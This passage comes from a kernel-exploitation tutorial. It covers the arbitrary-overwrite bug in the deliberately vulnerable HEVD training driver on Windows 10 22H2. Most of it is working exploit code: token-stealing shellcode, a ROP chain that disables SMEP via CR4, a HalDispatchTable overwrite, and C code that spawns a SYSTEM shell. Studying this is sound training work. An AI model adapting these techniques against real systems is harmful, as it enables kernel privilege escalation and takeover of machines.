      mov rcx, [rbx + 0440h]    ; Grab the PID
      cmp rcx, 04h      ; Check if PID matches SYSTEM PID
      jnz __loop      ; If not SYSTEM PID, jmp to __loop

    mov rcx, [rbx + 04b8h]    ; Grab the SYSTEM token
    mov [rax + 04b8h], rcx    ; Copy SYSTEM token to current process
    ret
  
shellcode_buf ENDP
END
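The loop in the shellcode is an ordinary walk over a circular doubly-linked list, where each link points into the middle of the next structure and has to be converted back to the start of that structure. The same idea is sketched below in user-mode C with a mock structure; the type and function names are hypothetical, and the field comments only indicate which _EPROCESS member each mock field stands in for.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry_t;

/* Mock stand-in for _EPROCESS: only the fields the loop touches. */
typedef struct {
    uint64_t     pid;      /* plays the role of UniqueProcessId (+0x440) */
    list_entry_t links;    /* plays the role of ActiveProcessLinks (+0x448) */
    uint64_t     token;    /* plays the role of Token (+0x4b8) */
} mock_process_t;

/* Equivalent of `mov rbx, [rbx + 0448h]` followed by `sub rbx, 0448h`. */
static mock_process_t *next_process(mock_process_t *p) {
    return (mock_process_t *)((char *)p->links.flink - offsetof(mock_process_t, links));
}

/* Walks the circular list until a process with the wanted PID is found; NULL if none. */
static mock_process_t *find_pid(mock_process_t *start, uint64_t pid) {
    mock_process_t *p = start;
    do {
        if (p->pid == pid)
            return p;
        p = next_process(p);
    } while (p != start);
    return NULL;
}
```

Unlike the assembly, this sketch stops after one full lap instead of looping forever when the PID is not present.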

Running the exploit with the above shellcode, we can confirm that we have successfully stolen the SYSTEM token!

There is one caveat, however: if we continue execution, we will get a BSOD because the kernel will not be able to resume properly. In order to actually use our new token, we need a way to keep the kernel from crashing once we continue after our exploit.

Preventing a BSOD

A BSOD happens when the kernel hits an error it cannot recover from, such as an unhandled exception. One method of preventing this is to simply never allow the thread to reach any exception-triggering code, by sending it into an infinite loop. This is not the cleanest method, but definitely one of the easier ones.

In order to trigger an infinite loop, we can store a JMP RAX gadget which we will jump to from inside of our shellcode.

// Store the JMP RAX
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x523fe0)); // jmp rax ; (1 found)

Inside of our shellcode, we will wipe the ROP chain we have just created, and trigger the infinite loop by storing the JMP RAX gadget in RAX and jumping to it.

shellcode.asm

.code
shellcode_buf PROC
    mov  rax, gs:[0188h]   ; _KTHREAD
    mov rax,  QWORD PTR [rax + 0b8h]   ; Current _EPROCESS
    mov rbx, rax      ; Copy _EPROCESS to rbx
    __loop:
        mov rbx, [rbx + 0448h]    ; Follow ActiveProcessLinks to the next process' list entry
        sub rbx, 0448h        ; Step back from the list entry to the start of that _EPROCESS
        mov rcx, [rbx + 0440h]    ; Grab the PID
        cmp rcx, 04h      ; Check if PID matches SYSTEM PID
        jnz __loop      ; If not SYSTEM PID, jmp to __loop

    mov rcx, [rbx + 04b8h]    ; Grab the SYSTEM token
    mov [rax + 04b8h], rcx    ; Copy SYSTEM token to current process

   ; Wipe our ROPchain
   mov rcx, 010h
    __wiper_loop:
        and QWORD PTR [rsp + 0], 0
        sub rsp, 08h
        dec rcx
        cmp rcx, 0
        jnz __wiper_loop

    mov rax, rdx ; Get the jmp rax gadget in rax
    mov rsp, rbp ; Fix our stack pointer to the original value
    sub rsp, 0118h
    jmp rax ; Start the infinite loop

shellcode_buf ENDP
END

HEVD_ArbitraryOverwrite.c

DWORD WINAPI ThreadFunc(LPVOID lpParam) {
	Sleep(500);
	WinExec("cmd", 1);
	return 0;
}

int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);

	// Create some distance between the RSI offset and our final buffer.
	PVOID RsiBufferLocation = AddPtrOffset(KernelBase, 0xCE9598 - 0x100);

	// Location of the RSI gadget
	PVOID RsiGadgetLocation = AddPtrOffset(RsiBufferLocation, 0x39);

	// Set the final buffer (ROP chain) location
	PVOID BufferLocation = AddPtrOffset(KernelBase, 0xCE9598);

	HANDLE execthread = CreateThread(NULL, 0, ThreadFunc, NULL, 0, NULL);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("[+] Device Handle: 0x%p\n", hFile);
		}

		int offset = -0x8;


		PVOID ShellcodeBuffer = VirtualAlloc(NULL, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
		if (ShellcodeBuffer == NULL) {
			printf("[-] Failed to allocate buffer for shellcode\n");
			exit(EXIT_FAILURE);
		}
		memcpy(ShellcodeBuffer, &shellcode_buf, 0x100);

		// Overwrite HalDispatchTable entry with our first gadget
		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x434f8d)); // push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

		// Take control over the stack in our second gadget
		WriteWhereWhat(hFile, RsiGadgetLocation, AddPtrOffset(KernelBase, 0x5b784e)); // pop rsp; ret; (1 found)

		// Prepare our ROP chain
		// Disable SMEP
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x51b5f5)); // pop rcx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), 0x250ef8); // Cr4 with SMEP disabled
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x9a63e3)); // mov cr4, rcx; ret; (1 found)

		// Restore HaliQuerySystemInformation
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x57adf1)); // pop rcx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x098f9d0)); // Address of the HaliQuerySystemInformation function
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), HaliQuerySystemInformationAddress); // Location where HaliQuerySystemInformation should be
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x7567b8)); // xor eax, eax; mov qword[rdx], rcx; ret; (1 found)

		// Store the JMP RAX
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x523fe0)); // jmp rax ; (1 found)

		// Exec shellcode
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), ShellcodeBuffer); // Jump to our shellcode

		// Set RSI to the RsiBufferLocation
		SetRSI(RsiBufferLocation);

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);
		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}

		printf("[*] Calling NtQueryIntervalProfile\n\n");
		_NtQueryIntervalProfile(0xdeadbeefdeadbeef, &BufferLocation);

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}

Profit

Full exploit code can be found here: HEVD

Wrapping up

This post has walked us through the process of exploiting the arbitrary overwrite vulnerability on Windows 10 22H2. The steps involved identifying nt!HaliQuerySystemInformation as a viable, indirectly callable function to target, finding the right ROP gadget in order to gain control over the stack, disabling SMEP in order to execute shellcode, and preventing a BSOD. I want to give special credit to Connor McGarr for sharing great knowledge and resources on kernel exploitation & mitigations.